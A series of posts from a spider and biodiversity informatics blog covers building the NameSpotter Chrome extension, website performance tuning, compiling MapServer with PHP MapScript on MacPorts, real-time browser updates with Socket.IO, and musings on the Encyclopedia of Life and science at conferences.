iSpiders<br />
Discussions on spider biogeography, systematics and more general comments on biodiversity informatics.<br />

<h1>NameSpotter: Experiences Making a Google Chrome Extension</h1>
<p><i>2013-07-01</i></p>
If you believe various <a href="http://www.w3schools.com/browsers/browsers_stats.asp">browser penetration statistics</a>, Google Chrome is more popular than any other browser in use today. And, with the imminent <a href="https://support.google.com/websearch/answer/2664197?hl=en">demise of the popular iGoogle homepage</a> later this year, my suspicion is that Chrome apps and extensions will grow in popularity...something is no doubt in the works in Mountain View. Many of these apps and extensions are freely available on the <a href="https://chrome.google.com/webstore/category/apps">Chrome Web Store</a>. Some time ago I decided to poke around and learn what it takes to develop a Google Chrome extension. I was pleasantly surprised at how easy it was. It's a good time to finally write about my experience, especially since I spent a few hours yesterday renewing an extension I designed called <a href="https://chrome.google.com/webstore/detail/namespotter/pogmooobpbggadhlleijfpjgnpkjdnhn">NameSpotter</a>, whose <a href="https://github.com/GlobalNamesArchitecture/name-spotter-chrome">code is on GitHub</a>. The first part of this post describes what my NameSpotter extension does and the second part is a cursory background to Chrome extension authoring.<br />
<h2>
What Does the NameSpotter Extension Do?</h2>
The NameSpotter Chrome extension puts a Morpho butterfly icon <img border="0" src="http://2.bp.blogspot.com/-8DgaxRSv788/UdGwoxPWMII/AAAAAAAAAQE/0S0p-pd3kPI/s19/icon-19-1.png" style="display: inline;" />
in your browser toolbar. Click it and its wings start to flap while the content of the current web page under view is sent to the <a href="http://gnrd.globalnames.org/">Global Names Recognition and Discovery</a> web service, where two scientific name-finding engines, <a href="http://code.google.com/p/taxon-finder/">TaxonFinder</a> and <a href="https://github.com/mbl-cli/NetiNeti">NetiNeti</a>, take action. A list of scientific names is returned and these are highlighted on the page. Run your cursor over a name and a tooltip draws up content about that name from the Encyclopedia of Life. There's a resizable navigation panel at the bottom of the page that lets you jump from name to name on the page or copy all or some of the found names to your clipboard for pasting elsewhere. Many of these features are customizable from a settings area in the navigation panel. For example, if you prefer not to have tooltips, you can turn those off.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-_cT2mR4uWfw/UdG2Joi-xkI/AAAAAAAAAQU/8Tx0IrYi0uY/s613/Screen+Shot+2013-07-01+at+1.00.57+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://4.bp.blogspot.com/-_cT2mR4uWfw/UdG2Joi-xkI/AAAAAAAAAQU/8Tx0IrYi0uY/s400/Screen+Shot+2013-07-01+at+1.00.57+PM.png" width="400" /></a></div>
<br />
The interface is in English or French, depending on your system settings. And, only common names (when known by EOL) in the language of your system settings are shown. If EOL had an API that accepted locale as a parameter, I'd use that too. As it stands, if your system settings are in French, you're still going to get English descriptive content in your tooltips.<br />
<br />
If you happen to be viewing a PDF while in Chrome and click the Morpho icon in your browser toolbar, you get a panel at the bottom of the page as usual but you don't get the tooltips. PDFs (sadly) are not HTML, so there's nothing I can do to manipulate the static content you're reading.<br />
<br />
There's quite a bit of action in this extension with many messages that get passed around from server to your browser and within the extension itself. I also made use of two very excellent jQuery plugins called <a href="http://bartaz.github.io/sandbox.js/jquery.highlight.html">Highlight</a> and <a href="http://calebjacob.com/tooltipster/">Tooltipster</a>. The most difficult aspect to handle was making sure the extension performs well, especially when there might be hundreds if not thousands of names on the page. This is where a little knowledge about the <a href="http://24ways.org/2011/your-jquery-now-with-less-suck/">performance of jQuery selectors</a> comes in handy.<br />
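For a flavour of what that means when there are thousands of highlighted names, here is a minimal sketch; the class names are hypothetical, not NameSpotter's actual markup:<br />
<br />
<pre><code>
// fast: a single class selector, cached once and reused
var $names = $(".ns-highlight");
$names.first().addClass("ns-active");

// slow: a complex selector that re-scans the whole DOM on every call
$("span.ns-highlight:visible").first().addClass("ns-active");
</code></pre>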
<h2>
What's Next?</h2>
There are plenty of other aspects to this extension that could be explored, such as:<br />
<ul>
<li><b>Auto-indexing URLs and scientific names</b>: Any click of the Morpho that results in found names could send the URL in the browser bar and the names found to an index without the user knowing. This would be equivalent to crowd-sourced web spidering. An aggregator of content like EOL might be very interested to receive URL + name combinations to make an auto-generating outlinks section.</li>
<li><b>Other sources of content in tooltips</b>: I designed the tooltip to be (relatively) flexible. If there are other resources that accept a scientific name as a query parameter in a JSON-based RESTful API, I could wire up their responses. If you are more interested in nomenclatural acts, I could for example use <a href="http://zoobank.org/Api">ZooBank's APIs</a>. Or, I could send the namestring to <a href="http://search.crossref.org/help/api">CrossRef's API</a> and pull back some recent publications. There's really no limit to sources of data. What's limiting is my appreciation of what's useful in this framework.</li>
<li><b>Sending annotations to the host</b>: This one's a bit half-baked, but why couldn't a Google Chrome extension be used to push annotations, questions, or comments to the host website? You'd need a bit of <a href="https://developer.chrome.com/extensions/tut_oauth.html">OAuth</a> and something on the web page to inform the extension that the host is willing to accept annotations and where to send them. Something like <a href="http://www.webhooks.org/">webhooks</a> comes to mind.</li>
</ul>
Do you have other suggestions?<br />
<h2>
How Do You Make a Chrome Extension?</h2>
Google Chrome extensions are remarkably simple, based solely on HTML, css and JavaScript, the basic tools of web page development. In contrast, Firefox and Internet Explorer extensions are <a href="https://developer.mozilla.org/en/docs/Building_an_Extension">horribly</a> <a href="http://msdn.microsoft.com/en-us/library/aa753587(v=vs.85).aspx">complex</a> and their documentation for first-timers is equally terrible. The <a href="http://developer.chrome.com/extensions/index.html">documentation</a> for Chrome extensions is wonderful, with plenty of tutorials and free samples. Development is made especially easy because you can load an "unpacked" extension, tweak it, reload it, and iterate with a few clicks from your Chrome extensions page while in developer mode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-QUhdSqCzbn4/UdGsleX3vkI/AAAAAAAAAP0/KmVX01l1QaA/s895/Screen+Shot+2013-07-01+at+12.20.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://2.bp.blogspot.com/-QUhdSqCzbn4/UdGsleX3vkI/AAAAAAAAAP0/KmVX01l1QaA/s640/Screen+Shot+2013-07-01+at+12.20.07+PM.png" width="640" /></a></div>
<br />
<br />
Chrome extensions have three basic parts: 1) a metadata file, 2) content scripts, and 3) background pages/event scripts, plus a very important construct: passing messages.<br />
<br />
<h3>
Parts of a Chrome Extension</h3>
<h4>
Metadata File</h4>
The metadata file is a static JSON document called the <a href="https://developer.chrome.com/extensions/manifest.html">Manifest</a>. It contains basic information about the extension such as a title, description and default locale (language), as well as more complex concepts such as permissions and the local JavaScript and css files the extension will use. As I learned the hard way, you cannot put bits in your manifest (<i>e.g.</i> configuration variables) that Google doesn't expect to see. So, if you have a need for configuration variables as I did, you have to do a bit of AJAX to grab the contents of your own static file:<br />
<br />
<pre><code>
nsbg.loadConfig = function() {
  var self = this,
      url = chrome.extension.getURL('/config.json');

  $.ajax({
    type : "GET",
    async : false,
    url : url,
    success : function(data) {
      self.config = $.parseJSON(data);
    }
  });
};
</code></pre>
<br />
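To make the sections below concrete, here is roughly the shape of a manifest. This is a trimmed, illustrative sketch (the file names are invented), not NameSpotter's actual manifest:<br />
<br />
<pre><code>
{
  "manifest_version" : 2,
  "name"             : "__MSG_extension_name__",
  "version"          : "1.0",
  "default_locale"   : "en",
  "permissions"      : [ "tabs", "http://*/*", "https://*/*" ],
  "browser_action"   : { "default_icon" : "icon-19.png" },
  "background"       : { "scripts" : [ "background.js" ] },
  "content_scripts"  : [ {
    "matches" : [ "http://*/*", "https://*/*" ],
    "js"      : [ "jquery.min.js", "content.js" ],
    "css"     : [ "namespotter.css" ]
  } ]
}
</code></pre>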
<h4>
Content Script(s)</h4>
<a href="https://developer.chrome.com/extensions/content_scripts.html">Content Scripts</a> are the JavaScript and css files that you want injected into the web page. They run in the context of web pages, but are encapsulated in their own space. You cannot execute JavaScript functions that might already be declared in the source of a web page. Besides, how would an extension know that such a function <i>could</i> be executed? Nonetheless, if you need jQuery or any other library to write your content scripts, drop 'em in a folder in your extension and declare 'em in your manifest. It is that simple. Content scripts do however have access to the DOM of web pages. So, you can modify links, access the pictures, or any other content on the web page via your content script.<br />
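A trivial sketch of that isolation in action (the selector and class name are invented for illustration):<br />
<br />
<pre><code>
// content.js: shares the page's DOM, but not its JavaScript world
$("a[href*='eol.org']").addClass("ns-flagged"); // reading and changing the DOM works

// calling a function the page itself defined does NOT work:
// pageDefinedFunction(); // ReferenceError in the content script's world
</code></pre>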
<h4>
Background Page / Event Script(s)</h4>
<a href="https://developer.chrome.com/extensions/background_pages.html">Background pages</a> do as their name suggests - they run in the background and don't require user interaction to do so. <a href="https://developer.chrome.com/extensions/event_pages.html">Event scripts</a> are similar to background pages but are more friendly toward system resources because they can free memory when not needed. Why do you need background or event scripts? A good candidate for a background page is material that supports a user interface. Another important reason for background pages or event scripts is that these have capabilities that content scripts do not, <i>e.g.</i> access to the context menu or bookmarks. You don't always need a content script, but you always need a background page or event script. If you do have a content script, a good rule of thumb is to keep it lean and mean and dump the heavy lifting into a background or event script.<br />
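For what it's worth, turning a background page into an event script is a manifest one-liner: set "persistent" to false (the file name here is illustrative):<br />
<br />
<pre><code>
"background" : { "scripts" : [ "events.js" ], "persistent" : false }
</code></pre>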
<h4>
Passing Messages</h4>
This is the most difficult part of a Chrome extension, but powerful once you understand why it's needed. Background scripts have access to system-like functions that content scripts do not, and content scripts respond to user interaction whereas background scripts (mostly) cannot. You bridge the two worlds by passing messages.<br />
<br />
Here's a method in a content script that broadcasts a message:<br />
<br />
<pre><code>
chrome.extension.sendMessage(/* JSON message */, function(response) {
  //do something with response
});
</code></pre>
...and the background/event script that listens for broadcasted messages and responds back.<br />
<br />
<pre><code>
chrome.extension.onMessage.addListener(function(request, sender, sendResponse) {
  //do something
  sendResponse(/* response body */);
});
</code></pre>
I used the word "broadcast" because, as you see from the above, there's nothing that indicates who sent the message or what it might contain. You avoid clashes with other installed modules that also use messages by constructing the body of your messages with care. In my case, I construct messages in my content scripts to contain the equivalent of a title in addition to a body, so I know I'm the one who sent the message:<br />
<br />
<pre><code>
{ "message" : "ns_clipBoard", "content" : "my stuff" }
</code></pre>
<h1>If EOL Started All Over Today, What Would be the Best Approach?</h1>
<p><i>2012-12-07</i></p>
Today I participated in a very engaging conversation with a group of systematists and ecologists who are intensely interested in cataloguing the diversity of life in their neck of the woods. They immediately recognized that such a compilation should contain authoritative content, it should contain links to relevant resources so as not to repeat efforts elsewhere, and it most definitely should be online. In my (perhaps naive) interpretation, it sounded much like the <a href="http://eol.org/">Encyclopedia of Life</a> (EOL), albeit at a smaller, more focused scale.<br />
But has EOL taken a winning approach? Has it sustained the interest it once had? Is it duplicating effort? Is it financially sustainable? Are remarkable, value-added products being built off its infrastructure that would not otherwise be possible? These aren't rhetorical questions. I just don't know. Shouldn't I know by now? Part of the answer will certainly depend on which metric you wish to use. And, these metrics will invariably draw upon the engagement of one audience or another.<br />
<br />
Here's an interesting thought experiment:<br />
<br />
If EOL had taken a radically different approach at the outset by becoming a taxonomically intelligent index (<i>e.g.</i> a Google-like product, but specifically tuned using a graph such as may eventually underpin the <a href="http://opentreeoflife.org/">Open Tree of Life</a>) instead of serving species pages aggregated from elsewhere, where would it be today? What could have been built from such a "product"?

<h1>Conference Tweets in the Age of Information Overconsumption</h1>
<p><i>2012-11-08</i></p>
Having been a remote Twitter participant in what <a href="http://storify.com/BioInFocus/esc-esab-2012-edmonton-ab-nov-3-7-2012?utm_source=t.co&awesm=sfy.co_cAqe&utm_medium=sfy.co-twitter&utm_content=storify-pingback&utm_campaign=">from all accounts</a> was a successful conference hosted by the <a href="http://www.esc-sec.ca/">Entomological Society of Canada</a> and the <a href="http://www.entsocalberta.ca/">Entomological Society of Alberta</a>, I have the luxury of now stepping back with a nice glass of red wine and thinking more deeply about the experience and its implications for the health of science. Dezene Huber has <a href="http://blogs.unbc.ca/huber/2012/11/08/twitter-jam/">also taken a breath</a> after he participated in person and provided valuable <a href="https://twitter.com/docdez">Tweet streams of his own</a>.<br />
<br />
The Saturday prior to the conference, I had a "wouldn't it be cool if" moment and put my fingers to action on a toy that could listen in on the Tweet streams being generated by conference goers as they prepared for the event, as they were in transit, as they sat in the audience, as they chatted over coffee, and as they celebrated their wins during the banquet.<br />
<br />
My roughshod little experiment was to encourage participants to include scientific names in their streams. After all, names are a very important part of how biology is communicated. I grabbed their Tweets in real-time, fed them into three web services, and stored the results in a relational database. Two of these web services were developed by me and Dmitry Mozzherin at the Marine Biological Laboratory under the NSF-funded <a href="http://globalnames.org/">Global Names</a> project led by David Patterson. These gave me the tools necessary to answer the questions, "Is this a name?" and "Where is this name in a classification?" The other web service I used was one recently assembled by some brilliant developers at <a href="http://www.crossref.org/">CrossRef</a> that figured out a way to execute rapid searches against their massive database of citations in the primary literature, assembled off the backs of researchers and publishers.<br />
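Conceptually, the plumbing looked something like the sketch below. The endpoint paths and response fields follow my reading of the public GNRD and CrossRef documentation of the day, and the helper functions are invented, so treat this as pseudo-code rather than the production script:<br />
<br />
<pre><code>
// for each incoming tweet: find names, then add classification and literature
function handleTweet(tweet) {
  $.getJSON("http://gnrd.globalnames.org/name_finder.json", { text : tweet.text },
    function(found) {
      $.each(found.names || [], function(i, name) {
        placeInClassification(name.scientificName); // invented helper
        $.getJSON("http://search.crossref.org/dois", { q : name.scientificName },
          function(citations) {
            saveResult(tweet, name, citations); // invented helper
          });
      });
  });
}
</code></pre>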
<br />
So, while "Ento-Tweeps" tapped a name, I immediately caught it, placed it in a hierarchy, and threw it to CrossRef. Within a split second after a Tweet appeared, I had links to the primary literature and I had some context. These were often amazingly accurate. Here's one that the prolific <a href="http://www.biodiversityinfocus.com/blog/">Morgan Jackson</a> tweeted during <a href="https://sites.google.com/site/niktatarnic/">Nikolai Tatarnic</a>'s paper entitled, "Sexual mimicry and paragenital divergence between sympatric species of traumatically inseminating plant bug":
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-g9IgLjR-NFs/UJxidaGS0eI/AAAAAAAAAOo/RWz_jtONPV8/s1600/Screen%2BShot%2B2012-11-08%2Bat%2B8.53.38%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://2.bp.blogspot.com/-g9IgLjR-NFs/UJxidaGS0eI/AAAAAAAAAOo/RWz_jtONPV8/s400/Screen%2BShot%2B2012-11-08%2Bat%2B8.53.38%2BPM.png" width="400" /></a></div>
<br />
Now that's useful!<br />
<br />
However...<br />
<br />
There were occasions where this <a href="http://escjam2012.shorthouse.net/bug/10">wasn't so useful</a>. These were examples of what some have called "Information Overload". But that's a misnomer. We're beginning to understand what this really is. A better term (if one were to become dependent on and fixated with streams like this) is "Information Overconsumption".<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/ljcFNUQF9qQ" width="560"></iframe>
<br />
So, how do we responsibly integrate the power of social media in scientific conferences?<br />
<br />
First, draft a light-hearted code of ethics - the same as we've become accustomed to with mobile phones at such events. Turn off the beeps and squawks! Turn off the unnecessary keypress chirps.<br />
<br />
Second, as tempting as it may be, DO NOT COMMERCIALIZE THIS! The corporate sector has already found its way into the conference arena, the last pure outlet for the exchange of science. A social media outlet could be a new channel for communication that will be instantly switched off if it were behind a paywall.<br />
<br />
Last, treat the messages <a href="http://ispiders.blogspot.ca/2012/01/science-is-product-in-wrong-marketplace.html">not as news</a>, but as products. Though the messages are instant, much like a stream of news, they are written by you, the one who has spent years honing your skills and learning your science.<br />
<br />
My only hope is that "toys" like mine and the web services upon which they depend improve with time. They MUST help sell your products in a way that does not lead to Information Overconsumption and they MUST add value to the messages you wish to convey. How? That's up to you.

<h1>Science is a Product in the Wrong Marketplace</h1>
<p><i>2012-01-03</i></p>
Instead of mindlessly watching a movie tonight, I browsed through Google Tech Talks and stumbled upon a spectacularly argued, wonderfully cadenced and orchestrated September 2011 presentation by Kristen Marhaver entitled, "Organizing the world's information by date and author is making Mother Earth sick".<br /><br /><iframe width="560" height="315" src="http://www.youtube.com/embed/lpA79aZ8Bug" frameborder="0" allowfullscreen></iframe><br /><br />Her thesis is that science is a product, not a news stream. And, because science is communicated in a self-serving, paywall-laden marketplace, its products are paradoxically valueless to outsiders (those who stand to benefit from this knowledge). Kristen argues that the first steps toward cracking into this marketplace could be to expose the inherently social dimension of science by using modern-day social gadgetry. Google+, Twitter and star ratings could reside around the periphery of online PDF reprint viewers. Unfortunately Kristen, this is still the wrong marketplace.<br /><br />The one place where the social dimension of science is abundantly obvious is the largely unchallenged scientific conference. There are ways for this energetic, youthful, exploratory dialogue to spill out onto the distant screens of those who could benefit. YouTube, Twitter and Google+ could all be used with religion at conferences because, for the most part, papers delivered are free from the publisher's grasp. Google Tech Talks and TED talks are spectacularly popular for very good reason: the medium is accessible. Plus, there is ample opportunity to make conferences more accessible and engaging to registrants themselves. How many times have you heard someone deliver a paper who feels the need to introduce his/her co-authors who could not be present, or to shamelessly advertise the upcoming paper/poster presentations of their graduate students? The moment someone walks up to the podium, I want all that pushed onto my iPad along with links to their reprints. I'd rather they just get on with it. If their presentation were recorded and later put on YouTube, I'd want the same experience. Sure, links to their reprints would likely throw me up against a brick paywall, but I'd already know and appreciate the context.<br /><br />To take this even further, why not really expose the scientific conference by advertising the downtime? On how many occasions have you gone to a conference, only to share a beer or two in the evening(s) WITH THE COLLEAGUES YOU ALREADY WORK WITH!? Instead, I want a post-conference un-drink. That is, I'd like to advertise my desire to have a drink by posting what I'd like to talk about and then blast the venue into the Twittersphere for members of the public to join me if they felt so inclined.
If it's a bust, I'll swallow my pride and go join another one...and I'll bring copies of my reprints.

<h1>Realtime Web</h1>
<p><i>2011-11-14</i></p>
I started work on a whimsical presentation I will soon give to the Biodiversity Informatics Group at the Marine Biological Laboratory about the <a href="http://en.wikipedia.org/wiki/Real-time_web">Realtime Web</a> and came up with the following kooky slide. Felt the urge to share.<br /><img style="width: 320px; height: 240px;" src="http://3.bp.blogspot.com/-sJxsR29HVyU/TsFK0sxhQAI/AAAAAAAAAMY/sCT4Gp20_-M/s320/Slide5.jpg" border="0" alt="" />

<h1>Amazing Web Site Optimizations: Priceless</h1>
<p><i>2011-11-13</i></p>
Quite literally priceless, as in costs nothing.<br /><br />I was obsessed with web site optimization these past few weeks, trying to trim off every bit of fat from page render times. As we all know, if a page takes longer than approximately 3-4 seconds to render, you can <a href="http://www.getelastic.com/performance/">expect to lose your audience</a>. Expectations for speed vary depending on the end-user's geographic location, but a website that is fast for a user in Beijing is just as important as one that is fast for a user in California. As might be expected, server hardware typically isn't the bottleneck. Another way of looking at this is to recognize that remarkable boosts in performance can be had on crap hardware. So, this post presents the tools I used to measure web site performance and describes the simple techniques I employed to trim the excess fat.<br /><br />My drug of choice to measure the effect of every little (or major) tweak has been <a href="http://www.webpagetest.org/">WebPagetest</a>, a truly invaluable service because I can quickly see where in the world and why my web page suffered. Knowing that it took <i>x</i> ms to download and render a JavaScript file or <i>y</i> ms to do the same for a css file meant I could see with precision what a bit of js or css cleansing does to a user's perception of my web site. I also used <a href="http://getfirebug.com/">Firebug</a> and Yahoo's <a href="http://developer.yahoo.com/yslow/">YSlow</a>, both as Firefox plug-ins. Google Chrome also has a <a href="http://code.google.com/speed/page-speed/docs/rules_intro.html">Page Speed</a> extension that I used to produce a few optimized versions of graphics files.<br /><br />Some tricks I employed to great effect, in order from most to least important:<br /><ol><li>Make css sprites. The easiest tool I found was the <a href="http://spritegen.website-performance.org/">CSS Sprite Generator</a>. Upload a zipped folder of icons and it spits out a download and a css file. Could it be any easier? Making a css sprite eliminates a ton of unnecessary HTTP requests and is by far the most important technique to slash load times.</li><li>Minify JavaScript and css. For the longest time, I was using the facile <a href="http://www.minifyjavascript.com/">JavaScript Compressor</a>, but the cut/paste workflow became too much of a pain. So, I elected to use some server-side code to do the same: <a href="https://github.com/rgrove/jsmin-php/">jsmin-php</a> and <a href="http://code.google.com/p/cssmin/">CssMin</a>.
When my page is first rendered, the composite js and css files are made in memory then saved to disk. Upon re-rendering (by anyone), the minified versions are served. <a href="https://github.com/dshorthouse/SimpleMappr/blob/master/lib/mapprservice.header.class.php">Here's the PHP class</a> I wrote that does this for me. Whenever I deploy new code, the cached files are deleted then recreated with a new MD5 hash as file titles.</li><li>Properly configure the web server. This is especially important for a user's second, third+ visit. You'd be crazy not to take advantage of the fact that a client's browser can cache! I use Apache and here's what I have:<br /><br /><pre><code>
&lt;Directory "/var/www/SimpleMappr"&gt;
  Options -Indexes +FollowSymlinks +ExecCGI
  AllowOverride None
  Order allow,deny
  Allow from all
  DirectoryIndex index.php
  FileETag MTime Size
  &lt;IfModule mod_expires.c&gt;
    &lt;FilesMatch "\.(jpe?g|png|gif|js|css|ico|php|htm|html)$"&gt;
      ExpiresActive On
      ExpiresDefault "access plus 1 week"
    &lt;/FilesMatch&gt;
  &lt;/IfModule&gt;
&lt;/Directory&gt;
</code></pre>
Notice that I use the mod_expires module. I also set the FileETag to MTime Size, though this was marginally effective.</li><li>Include ALL JavaScript files just before the closing body tag. This boosts the potential for parallelism and the page can begin rendering before all the JavaScript has finished downloading.</li><li>Serve JavaScript libraries from a Content Delivery Network (CDN). I use jQuery and serve it from <a href="http://docs.jquery.com/Downloading_jQuery#CDN_Hosted_jQuery">Google</a>. Be wary that, on average, it is best to draw content from no more than 3-4 external domains in total. This includes static content servers that might be a subdomain associated with your web site. Beyond that, DNS look-up times outweigh the benefit of parallelism, especially for aged versions of Internet Explorer. Modern browsers are capable of more simultaneous connections, but we cannot (yet) ignore IE. I once served jQueryUI via the Google CDN, but because this was yet another HTTP request, it was slower than had I served it from my own server. So, I now pull jQuery from the Google CDN and I include jQueryUI with my own JavaScript in a single minified file from my server.</li><li>Use a Content Delivery Network. I use <a href="https://www.cloudflare.com/">CloudFlare</a> because it's free, was configured in 5 minutes and, within a day, there was noticeable global improvement in web page speed as measured via WebPagetest. Because I regularly push new code, I use the CloudFlare API to flush their caches whenever I deploy. However, this is largely unnecessary because they do not cache HTML and, as mentioned earlier, I use an MD5 hash as my js and css file titles.</li></ol>So there you have it: I was able to trim 4-6 seconds from a very JavaScript-heavy web site. And, web page re-render speed is typically sub-second from most parts of the world. Because much of the content is proxied through CloudFlare, my little server barely breaks a sweat.<br /><br />Did I mention that none of the above cost me anything?

<h1>SimpleMappr Embedded</h1>
<p><i>2011-06-26</i></p>
I never had high hopes for <a href="http://www.simplemappr.net/">SimpleMappr</a>. There are plenty of desktop applications to produce publication-quality point maps.
But it turns out users find these hard to use or too rich for their pocketbooks. As a result, my little toy and its API are getting a fair amount of use. I find this greatly encouraging, so I occasionally clean up the code and add a few logical, unobtrusive options.<br /><br />A number of users appear to want outputs for copy-paste on web pages and not copy-paste into manuscripts, so I just wrote an extension to permit embedding.<br /><br />Here's one such example using the URL<br /><a href="http://www.simplemappr.net/?map=643&width=500&height=250">http://www.simplemappr.net/?map=643&width=500&height=250</a>:<br /><br /><img src="http://www.simplemappr.net/?map=643&width=500&height=250" /><br /><br />Happy mapping...

<h1>Lightweight, Cross-platform, Real-time Browser-Browser Communications</h1>
<p><i>2010-11-15</i></p>
During a monthly meeting to discuss cutting-edge technologies here at the Biodiversity Informatics Group at the Marine Biological Laboratory, I demonstrated a technique to update distributed browsers in the face of collaborative classification (i.e. tree) editing. In essence, if there are 2+ people asynchronously (i.e. via AJAX calls) updating content on a web page, there is potential for everyone to get horribly out of sync with one another. Imagine, for example, a chat window on a web page that does not update on everyone's screen in real time...it wouldn't make for a particularly pleasant or useful experience for anyone. The same lousy experience was true in the LifeDesks tree editor when 2+ people were simultaneously updating the same classification. Person A might delete or move a node and persons B, C, D, <i>etc.</i> are none the wiser and might later perform an action on that node (or its children) even though the database no longer reflects what they see on their browser screen.<br /><br /><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&hl=en_US"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><br /><br />To work around the possibility that everyone editing can get horribly out of sync with one another, I implemented a polling mechanism to grab recent adjustments to data every 5 seconds. If you happen to be looking at a portion of the tree that someone else has just deleted or moved elsewhere in the tree, the relevant nodes will now automagically refresh to reflect actions that someone else just did...nodes will flash red then disappear, nodes will flash green then appear, etc. There is also a scrolling activity monitor at the bottom of the screen. To be sure, this isn't a particularly robust mechanism because there is constant polling. Enter web sockets...<br /><br /><a href="http://www.linkedin.com/in/ryanschenk">Ryan Schenk</a>, who attended this informal demonstration, alerted me to <a href="http://socket.io/">Socket.IO</a>. I knew of it, but never paid much attention. However, after having poked around a little with the examples provided, I am convinced this is the way I should have designed real-time classification tree updates in the face of 2+ simultaneous user actions.<br />
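For a feel of the pattern, here is a minimal sketch in the spirit of the early Socket.IO releases. The API details are approximate, so check the Socket.IO docs rather than copying this verbatim:<br />
<br />
<pre><code>
// server (node.js): re-broadcast each edit to every other connected editor
var http = require('http'),
    io   = require('socket.io');

var server = http.createServer(function(req, res) { /* serve the editor */ });
server.listen(8080);

var socket = io.listen(server);
socket.on('connection', function(client) {
  client.on('message', function(edit) {
    client.broadcast(edit); // everyone except the sender sees the change
  });
});
</code></pre>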
The lightweight technique will prove useful for any client-client communications (e.g. real-time chat). Plus, it has the excellent benefit of cross-browser, cross-platform capabilities with very little server strain. A database need only be hit once when person A exerts an action and the data propagates to all other users. Very cool.

<h1>MapServer, MapScript, MacPorts</h1>
<p><i>2010-11-12</i></p>
<div style="float: left; height: 90px;"><img style="width: 183px; height: 70px; vertical-align: middle;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TN2jQVpVxlI/AAAAAAAAAKY/vsldFj8MyXU/s320/macports-logo-top.png" alt="" border="0" /></div><div style="float: right; height: 90px;"><img style="width: 320px; height: 85px; vertical-align: middle;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/TN2jJ69ID8I/AAAAAAAAAKQ/gfRgOV9gj8s/s320/banner.png" alt="" border="0" /></div><div style="clear: both;"></div><br />For anyone wishing to get into <a href="http://mapserver.org/">MapServer</a> and serve shapefiles via PHP, and who also uses a Mac with <a href="http://www.macports.org/">MacPorts</a> for local development, here is how to compile. I discovered the hard way that the <a href="http://trac.macports.org/browser/trunk/dports/gis/mapserver/Portfile">MacPorts port</a> for MapServer is horribly dated and DOES NOT include PHP MapScript. The compile instructions below assume you already have the php5 MacPort.<br /><br />Install some dependencies if you haven't already got them:<br /><br /><pre><code>
sudo port install php5-gd
sudo port install xpm
sudo port install proj
sudo port install geos
sudo port install gdal
</code></pre>
1. Download the latest MapServer tarball from http://mapserver.org/download.html (<i>e.g.</i> at the time of writing, <a href="http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz">http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz</a>)<br />2. Extract and cd into the folder<br />3. Execute from the command line:<br /><br /><pre><code>
$ ./configure \
--prefix=/usr \
--with-agg \
--with-proj=/opt/local \
--with-geos=/opt/local/bin/geos-config \
--with-gdal=/opt/local/bin/gdal-config \
--with-threads \
--with-ogr \
--without-tiff \
--with-freetype=/opt/local \
--with-xpm=/opt/local \
--with-png=/opt/local \
--with-jpeg=/opt/local \
--with-gd=/opt/local \
--with-wfs \
--with-wcs \
--with-wmsclient \
--with-wfsclient \
--with-sos \
--with-fribidi-config \
--with-experimental-png \
--with-php=/opt/local
</code></pre>
4. Execute from the command line: $ make<br />5. Verify that mapserv is working by executing ./mapserv -v<br />6. Find php_mapscript.so in mapscripts/php3 and move it to the PHP extensions directory (usually /opt/local/lib/php/extensions/no-debug-non-zts-20090626/ for MacPorts). You may also need to add php_mapscript.so to your php.ini.<br />7. Move mapserv into the cgi-bin folder for the web server and give it permission to execute if you desire using it directly (optional)<br /><br />If MacPorts's <a href="http://www.gdal.org/">GDAL</a> were similarly updated to v. 1.7.3, you could use GeoRSS data just as you would use shapefiles. But, alas, at the time of writing, the version in MacPorts is v. 1.6.2.
<br /><br />While we're on the mapping kick, here is a very excellent source of shapefiles: <a href="http://www.naturalearthdata.com/">http://www.naturalearthdata.com/</a><br /><br />...and a bit of <a href="http://dev.numerex.com/code-snippets/article/consuming-georss-feeds-with-php/">PHP code to consume GeoRSS</a> using the Magpie RSS library. The author uses some deprecated PHP functions in places, but it is nonetheless quite useful.

<h1>Reference Parser Revived</h1>
<p><i>2010-08-21</i></p>
<style type="text/css">.refparser-icon{margin-left:3px;vertical-align:middle;}</style><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script><script type="text/javascript" src="http://refparser.shorthouse.net/assets/jquery.refparser.js"></script><script type="text/javascript">$(function(){var options = {target : '_blank'};$(".biblio-entry").refparser(options);});</script><br />Many moons ago, I developed a tool that does real-time discovery of scientific references using a combination of the aged (though still very useful) <a href="http://paracite.eprints.org/developers/">ParaTools</a> and <a href="http://www.crossref.org/">CrossRef</a>'s OpenURL service. With the demise of my server, this bit of code was lost. <span style="text-decoration: line-through;">I just revived the code and functionality and provide it here for anyone else to take and refine</span> UPDATE: parsing is now executed with a Ruby gem: <a href="http://refparser.shorthouse.net/">http://refparser.shorthouse.net/</a>. This location is not likely to persist, so get it while you can. To get a sense of what it does, here are some verbatim references. Click the magnifying glass after each reference to experience the magic. Cross-domain AJAX requests are circumvented by using jQuery's clever JSONP handling.<p class="biblio-entry">Bell, C. D., & Patterson, R. W. (2000). Molecular phylogeny and biogeography of <em>Linanthus</em> (Polemoniaceae). <em>American Journal of Botany</em>, <strong>87</strong>, 1857-1870.</p><p class="biblio-entry">Epling, C., & Dobzhansky, T. (1942). Genetics of natural populations. VI. Microgeographic races in <em>Linanthus parryae</em>. 